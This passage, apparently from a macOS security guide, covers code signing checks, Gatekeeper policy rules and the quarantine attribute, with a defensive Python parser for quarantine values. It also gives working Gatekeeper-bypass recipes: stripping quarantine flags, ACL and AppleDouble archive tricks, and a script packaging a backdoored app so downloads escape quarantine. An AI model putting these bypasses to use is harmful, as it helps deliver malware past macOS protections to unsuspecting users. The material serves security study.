```bash
# Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

# Check if the app's contents have been modified
codesign --verify --verbose /Applications/Safari.app

# Get entitlements from the binary
codesign -d --entitlements :- /System/Applications/Automator.app # Check the TCC perms

# Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app

# Sign a binary
codesign -s <cert-name-keychain> toolsdemo
```

```bash
# Open database
sqlite3 /var/db/SystemPolicy

# Get allowed rules
SELECT requirement,allow,disabled,label from authority where label != 'GKE' and disabled=0;

requirement|allow|disabled|label
anchor apple generic and certificate 1[subject.CN] = "Apple Software Update Certification Authority"|1|0|Apple Installer
anchor apple|1|0|Apple System
anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists|1|0|Mac App Store
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
```

```bash
# Check if allowed - nop
spctl --assess -v /Applications/App.app
/Applications/App.app: rejected
source=no usable signature

# Add a label and allow this label in GateKeeper
sudo spctl --add --label "whitelist" /Applications/App.app
sudo spctl --enable --label "whitelist"

# Check again - yep
spctl --assess -v /Applications/App.app
/Applications/App.app: accepted
```
## Quarantine Files

When an application or file is downloaded, certain macOS applications, such as web browsers or email clients, attach an extended file attribute known as the "quarantine flag" to the downloaded file. This attribute acts as a security measure: it marks the file as coming from an untrusted source (the Internet) and as potentially carrying risk. However, not every application attaches this attribute; common BitTorrent client software, for example, usually skips this step.
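As an added example (not code from the original page), a small Python parser for the value stored in the `com.apple.quarantine` attribute, which a defender can use to triage what the download agent recorded for each file. The sample values are constructed, and the `QuarantineInfo` and `triage` names are this example's own.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional, Tuple


@dataclass
class QuarantineInfo:
    flags: int                # bit field; 0x0081 is typical for browser downloads
    timestamp: Optional[int]  # download time as unix seconds, None if absent
    agent: str                # application that set the flag (Safari, Chrome, ...)
    uuid: str                 # key into the LSQuarantineEvent database

    def downloaded_utc(self) -> Optional[str]:
        if self.timestamp is None:
            return None
        return datetime.fromtimestamp(self.timestamp, tz=timezone.utc).isoformat()


def parse_quarantine(value: str) -> QuarantineInfo:
    """Parse the raw attribute value '<flags hex>;<time hex>;<agent>;<uuid>'.
    The agent and uuid fields may be empty or missing."""
    parts = value.split(";")
    if len(parts) < 2:
        raise ValueError(f"malformed quarantine value: {value!r}")
    parts += [""] * (4 - len(parts))  # pad missing trailing fields
    flags = int(parts[0], 16)
    timestamp = int(parts[1], 16) if parts[1] else None
    return QuarantineInfo(flags, timestamp, parts[2], parts[3])


def triage(entries: List[Tuple[str, Optional[str]]]) -> List[Tuple[str, str]]:
    """Label each (path, xattr value or None) pair. A file that arrived from
    the Internet without the attribute deserves a closer look, because
    Gatekeeper will not assess it on first launch."""
    verdicts = []
    for path, raw in entries:
        if raw is None:
            verdicts.append((path, "no quarantine attribute"))
            continue
        info = parse_quarantine(raw)
        verdicts.append((path, f"quarantined by {info.agent or 'unknown agent'}"
                               f" at {info.downloaded_utc() or 'unknown time'}"))
    return verdicts


# Constructed sample in the real value format, not captured from a system.
SAMPLE = [
    ("Downloads/report.pdf", "0081;64a1b2c3;Safari;6E2F0A10-1111-2222-3333-444455556666"),
    ("Downloads/test/._a", None),
]

if __name__ == "__main__":
    for path, verdict in triage(SAMPLE):
        print(f"{path}: {verdict}")
```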
</details>
Then **remove** that attribute with the following command:
```bash
xattr -d com.apple.quarantine portada.png

# You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
```

```bash
chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server

# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
```

```bash
mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantine attribute
```

```bash
# Create an app bundle with the backdoor and call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar
```